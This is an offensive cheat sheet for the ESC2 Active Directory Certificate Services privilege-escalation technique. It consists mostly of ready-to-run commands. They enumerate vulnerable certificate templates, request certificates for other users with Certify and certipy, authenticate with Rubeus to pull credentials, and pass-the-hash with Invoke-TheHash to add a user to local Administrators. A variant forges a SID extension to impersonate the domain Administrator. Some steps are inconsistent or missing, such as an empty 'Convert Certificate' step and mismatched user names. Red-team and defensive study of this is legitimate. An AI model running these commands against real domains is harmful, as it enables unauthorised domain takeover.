ESC2
This privilege escalation technique requires the following:
- Any Purpose EKU which allows the attacker to get a certificate that can be used for all purposes (Client Authentication, Code Signing, ...)
-
ENROLLEE_SUPPLIES_SUBJECT
attribute enabled - a user with enrollment rights
To make it easier to remember, the only difference between ESC1 and ESC2 is the require EKU. If, for some reason, a certificate template is configured with no EKU, we will be able to use it just like a template with Any Purpose EKU.
Windows
Enumerate ESC2 vulnerability
PS /home/bobbuilder> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=local,DC=lab'
Requesting a certificate
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:user1@minions.com
Convert Certificate
Certificate Authentication
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:user1 /certificate:cert.pfx /getcredentials /nowrap
PassTheHash using Invoke-TheHash
PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> cd .\Invoke-TheHash\;Import-Module .\Invoke-TheHash.psm1
PS /home/bobbuilder> Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash your_hash -Command "net localgroup Administrators user2 /add"
Linux
Certificate Request with alternative SAN
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca <ca_name> -template <template_name> -upn user1
Certificate Authentication
bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip>
Verify
bob$ KRB5CCNAME=administrator.ccache smbexec.py -k -no-pass minions.com
ESC2 in CBA-Patched Environments
Once again, if working in a CBA-patched environment we can use Certify's (or Ceritipy's) sidextension
argument
PS /home/otter> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com